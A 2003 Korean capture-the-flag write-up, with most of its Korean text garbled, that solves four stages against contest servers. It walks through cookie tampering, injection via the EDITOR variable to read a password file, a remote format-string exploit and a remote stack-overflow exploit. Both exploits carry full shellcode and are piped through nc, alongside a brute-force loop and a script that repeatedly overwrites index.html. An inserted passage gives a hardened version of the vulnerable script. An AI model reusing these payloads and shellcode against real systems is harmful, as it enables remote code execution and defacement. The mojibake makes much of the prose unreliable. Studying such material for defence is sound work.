============================================================================

        2003 õд ŷ ȸ

============================================================================
o ۼ
-    : (mirinda)
- ̸ : w0rm9@hanmail.net

o ȸ  
- 4ܰ  ȹ

============================================================================
1. Ұ

[ 1 ܰ ]
http://211.205.70.252 Ͻþ    ȹϼ
admin ٽÿ  н带 ݴϴ.


[ 2 ܰ ]
211.205.70.252 18523/tcp Ʈ Ư  α׷ ϰ ֽϴ.
 α׷  ϸ ƯϾȿ  н尡 ֽϴ.


[ 3 ܰ ]
211.205.70.252 35232/tcpƮ Ư  ϰ ֽϴ.
Ư ɿ  ߻մϴ.


[ 4 ܰ ]
211.205.70.253 23152/tcpƮ Ư  ϰ ֽϴ.
ش  3   Format strings ġϿ  Ȱȭ  ߰Ǿ 
Ư ɿ Buffer Overflow մϴ.
4    ȸ     ؾ  ڰ ˴ϴ. 
   index.html Ͽ ڽ ID Խϸ ˴ϴ.
, Capture the flag   Դϴ.

===========================================================================
2.  Ǯ 

[ 1 ܰ ]
http://211.205.70.252 ϴ â  Ÿ.
 admin  ؾ߸  н带 شٰ 
 admin ȹϴ ̴.
â F11  ִȭϿ ּ(level1auth.html) ˾Ƴ view-source 
α â  Էµ  /cgi-bin/LeVel1NiMdA.cgi  POST  ٴ° ˰ԵǾ.
"HTTP  POST " α׷   ְ޴ Ŷ ĸغ
  κ   ־.

Set-Cookie: auth=user; expires=30-Nov-03 00:00:00 GMT; path=/cgi-bin/

ϰǵ auth=userκ  ϴ κΰ .
׷ٸ auth=admin ٲ㼭 Ű    .  ࿡ Űܺ.

[mirinda@localhost mirinda]$ telnet 211.205.70.252 80
POST /cgi-bin/LeVel1NiMdA.cgi        HTTP/1.0
Referer: http://211.205.70.252/level1auth.html
Accept-Lanuage: ko
Content-Type: acclication/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: 211.205.70.252
Content-Length: 100
Cache-Control: no-cache
Cookie: auth=admin




HTTP/1.1 200 OK
Date: Wed, 26 Nov 2003 03:50:10 GMT
Server: Web/1.0.00 (Unix)
Set-Cookie: count=1; expires=30-Nov-03 00:00:00 GMT; path=/cgi-bin/
Connection: close
Content-Type: text/html

<html>
<head>
<title>Level1 Auth</title>
</head>
<body>

You are admin level.<br>

Next stage <hr>
<pre>
մϴ. 1  ذϼ̽ϴ.

 ð Ʒ ش ŷȸ  Ʈ

(hacking.kcs.ac.kr) α  Ͻñ ٶϴ.

ش : 2qjsanswpfh%ok

</pre>

username : admin<br>
</body>
</html>



============================================================================
[ 2 ܰ ]
ش  غ ̻(?) commad  Ÿ.
help;    ɾ Ȯ  ־.

HELP=========================================
id;      : current user id
cul;     : calculator   eg) cul 1 + 2;
date;    : current date and time
cal;     : calendar
echo;    : message test eg) echo this is test;
src;     : view source
srcl;    : available source list
rand;    : generate random value
logtime; : login time
fortume; : fortune game
myip;    : print your IP

 "ƯϾȿ  н尡 ֽϴ."  Ͽ src ̿Ͽ  Ư     ϴ.
 src ҽ 

src src;
======= source =[src]====================
#!/bin/ksh

if /bin/test -z $1 ; then echo "usage: src <name>"; exit ; fi

fname=`/bin/basename $1`

if /bin/test -z $EDITOR ; then EDITOR=/bin/cat ; fi

echo "======= source =[$fname]===================="
$EDITOR source/$fname
echo "============================================"

ҽ  ǿ밡ɼ δ. export ̿ EDITOR شǴ ȯ溯  
src Ű   ϴ.
 source ƴ ٸ  캸.

export EDITOR="echo /*";
src src;
======= source =[src]====================
/bin /cal /cul /date /etc /fortune /help /id /lib /source /src /srcl /usr source/test

ֻ 丮   丮  

export EDITOR="echo /etc/*";
src src;
======= source =[src]====================
/etc/PASSWORD /etc/suid_profile source/src
============================================

PASSWORD  ã  ־.
  о    EDITOR ϸ ȴ.

export EDITOR="/bin/cat /etc/PASSWORD";
̷ EDITOR  ä   /bin/cat /etc/PASSWORD source/$fname

src src;
======= source =[src]====================
մϴ. 2  ذϼ̽ϴ. 
 ð Ʒ ش ŷȸ  Ʈ
(hacking.kcs.ac.kr) α  Ͻñ ٶϴ.
  3   ŷ ɷ 
 ȰϿ ذ ñ ٶϴ.

ش : wk!ghkxld-3
#!/bin/ksh

if /bin/test -z $1 ; then echo "usage: src <name>"; exit ; fi

fname=`/bin/basename $1`

if /bin/test -z $EDITOR ; then EDITOR=/bin/cat ; fi

echo "======= source =[$fname]===================="
$EDITOR source/$fname
echo "============================================"
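
The `src` script above expands `$EDITOR source/$fname` unquoted, so the shell splits a user-set EDITOR into a command plus extra arguments, which is what `export EDITOR="/bin/cat /etc/PASSWORD"` relies on. A hardened variant follows as an added example (not part of the original write-up or the contest server's code); the function name `view_source`, the `SRC_DIR` variable and the file-name allow-list are assumptions.

```shell
#!/bin/sh
# Hardened take on the `src` viewer shown above (added example).
# Assumption: viewable files live in a single directory, SRC_DIR.
SRC_DIR="${SRC_DIR:-source}"

view_source() {
    # Require exactly one non-empty argument.
    if [ "$#" -ne 1 ] || [ -z "$1" ]; then
        echo "usage: src <name>" >&2
        return 2
    fi

    # Drop any directory component; `--` keeps a leading '-' from being
    # parsed as an option, and the quotes prevent word splitting.
    fname=$(basename -- "$1")

    # Allow-list (assumed policy): letters, digits, '.', '_' and '-',
    # and no leading dot, so hidden files and odd names are rejected.
    case "$fname" in
        ''|.*|*[!A-Za-z0-9._-]*)
            echo "src: invalid name" >&2
            return 2
            ;;
    esac

    # Only regular files inside SRC_DIR are shown.
    if [ ! -f "$SRC_DIR/$fname" ]; then
        echo "src: no such source" >&2
        return 1
    fi

    echo "======= source =[$fname]===================="
    # The viewer is a fixed absolute path. $EDITOR is never consulted, so a
    # value exported by the remote user cannot become a command or add
    # file arguments to it.
    /bin/cat -- "$SRC_DIR/$fname"
    echo "============================================"
}
```

If a configurable viewer is really needed, it should come from the service's own configuration rather than from an environment variable the remote user can `export`.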



============================================================================
[ 3 ܰ ]
ش  ؼ  ɾ(?) ĺ  ɾ Դ.
 κп û ߴ. Ư ɿ  ִٰ ؼ ɾ ϴ ãƾ Ǵ ˾Ҵ.
(ּ HELP ĺ  ̷  ð   ־ ٵ...ҹڷδ help ĺþµ...)

ƹư HELP   ɾ ٸ ɾ ٸ ۵ ϴµ
OPTD, OPTS, OPTE  ɾ ۵ Ͽ.
OPTD , OPTS ó ְ, OPTE Է ɾ Echo Ű ̿.

ٸ  ޸ ǽɵǴ κ , OPTE ǽɽ   ɼ on ¿
AAAA%x%x%x%x  Է Ҵ. ó fsb . װ͵ remote.

ͽ÷  غ.   ϰ, level3 йȣ Էϰ,
ɼ ѾѴ. ׷ OPTE, ׸ ÿ   Ȯغ  OPTS, ϱ  OPTD
  onŲ. shellcode ּҿ ret ּҷ  佺Ʈ ڵ带 Է  ˳  ۿ
NOPڵ Բ ڵ带 ִ α׷ ۼغҴ.

 κп   κ ret ּҸ ã° ̾. shellcode ּҴ   ñ  ʾƼ
  ,  , ret ּҰ  ʺ ϳ  ߴ.
ּҴ 0xbffefbcc, ũƮ ͽ÷ ۼ  ϴ 

================attck.sh================
#!/bin/sh
    (echo -ne "wk!ghkxld-3\nOPTE\nOPTS\nOPTD\nAAAA\xcc\xfb\xfe\xbfAAAA\xce\xfb\xfe\xbf%8x%8x%8x%64544c%hn%50102c%hn\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh\n";cat) | nc 211.205.70.252 35232

cat PASSWORD
մϴ. 3  ذϼ̽ϴ. 
 ð Ʒ ش ŷȸ  Ʈ
(hacking.kcs.ac.kr) α  Ͻñ ٶϴ.
Ƿ Ͻñ.  ѹ ҽϴ.

ش : eoeks$tlffur&wk  



============================================================================
[ 4 ܰ ]
̹ ģϰԵ remote bof° ˷־.
ش  ϴ 3 ô ģ ɾ Ÿ.
̹   ɼ OPTS, OPTD, OPTE.. ɼ on Ų ¿ ̷  ɾ Էϴ 
USER ɿ ̻ κ ߰  ־.
USER AAAA   Էϸ ÿ =CHECK2=  =CHECK1= κ Ÿ ̴.
  Ʈ Է Ҵ.
USER AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ̷  ܹȴ.
 ڸ Է   ˾ƺ 24 Է± , 25°  .
25° =CHECK1= ۺκ̴. ̰ ð δ. ش ڿ Էºκп  ڿ Ȱ Էν
  ־.   κп Segmentation fault  .  ret ġ ã° .
̹  ڿ Էϴ  α׷ Ǵ  ã  ־. =CHECK1=  120 Էϸ
α׷ Ͽ. Ʈ ¿ sfp ħϿ α׷ Ǵ, ret 뷫
USER AAAAAA24AAAAAA=CHECK1=AAAAAAAAAA120AAAAAAAAAA+4+ret

׷ ̹ Ʈ ̹Ƿ ͽ÷ ۼؾѴ.
̹  4 н带 Էϰ, ̹ ø Ȯϱ  OPTS on Ű, 
USER  CHECk1= Ȱ ,  ڿ NOPڵ带   ڵ带   ret ڵ ּҸ 
־ָ ǰڴٰ ϰ ͽ÷ ۼߴ.
 Ǿ ߴµ, Illegal Character found   ڿ ѷ־.
 ãƺ NOPڵ忴. ׷ 0x90 -> 0x40 üϰ ٽ ͽ÷  Ҵ.
̷ ̹  ۿ ־ ڵ ġ  (α׷ ų ) ٲ
 ߴ. ̷    ̴. ׷ ͽ÷ ѷ Ű α׷  ϳ ۼߴ.

================attack.c================
#include <stdio.h>   /* sprintf */
#include <stdlib.h>  /* system */

int main(){
        char cmd[1000];
        sprintf(cmd,"(printf \"eoeks\\$tlffur&wk\\nOPTS\\nUSER 123456789012345678901234=CHECK1=\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80\xc8\xf5\xff\xbf\xc8\xf5\xff\xbf\\n\";cat) | nc 211.205.70.253 23152");
        system(cmd);
}

================loop.c================
#include <stdlib.h>  /* system */

/* Re-run ./attack in an endless loop. */
int main(void)
{
        for(;;){
        system("./attack");
        }
}

loop  attack  (Ȯ ʴ ּҸ enter ߾ Ѵ.) Ű Էص
ƹ ȭ .  ̴.
̹  PASSWORD ã 

cat /PASSWORD
մϴ. 4  ذϼ̽ϴ. 
 ð Ʒ ش ŷȸ  Ʈ
(hacking.kcs.ac.kr) α  Ͻñ ٶϴ.
4    ȸ     ؾ  ڰ ˴ϴ. 
   index.html Ͽ ڽ ID  Ȯ   ֵ
ǥϸ ˴ϴ. 
, Capture the flag   Դϴ. 

ش : cnr^rhwlrhtn%tmdflfmfdnlgo



[ Capture the flag ]
ó perl µ 𸣰, ksh ̿ؼ ũƮ § 

#!/bin/ksh

while [ 1 ]
do
echo "<font color=red size=10><b>mirinda@WiseGuyz</b></font>" > /htdocs/index.html
done

 Ű ۿ .
 ƾ ε  ȭ   ־.

ڴʰ perl   ˰  ҷص DOS   .
ƽ ⼭ ȸ ؾ߸ ߴ.

============================================================================
3. ȸı 

 ȸ غ  Ͻ, ׸ ûı ϼž ϴ
 в 帳ϴ.^^
Ʈ  ΰ  غ ȸ   ʿ߰,
 Ͽ б   ־ ʰԱ  ȸ .

 ƽ  ִٸ ȸ̳  ǰϴ Ȯ  ȸ   
ʾҴ Դϴ.     ŬѴٴ,    ª ð Ŭ ̶
   κ Ǵ ʰ Ǿ(ȸ ..)

 ȸ  index.html Ż ֱ ε ̿  Ȯ (?)  ׿.
 ý   ִ  Ѵٰ  ...
DOS ߴٸ ̸  ߴٸ   ߳׿.


 ȸ   ȸ մϴ.^^
׷     ŵνñ ٶϴ.



ps.  4    Ű ʴ´ٸ  ׷ Ȯ ä 
ȹ θ ؾ    ְڳ׿.

ps2.   ż  µ ָԾϴ. :(
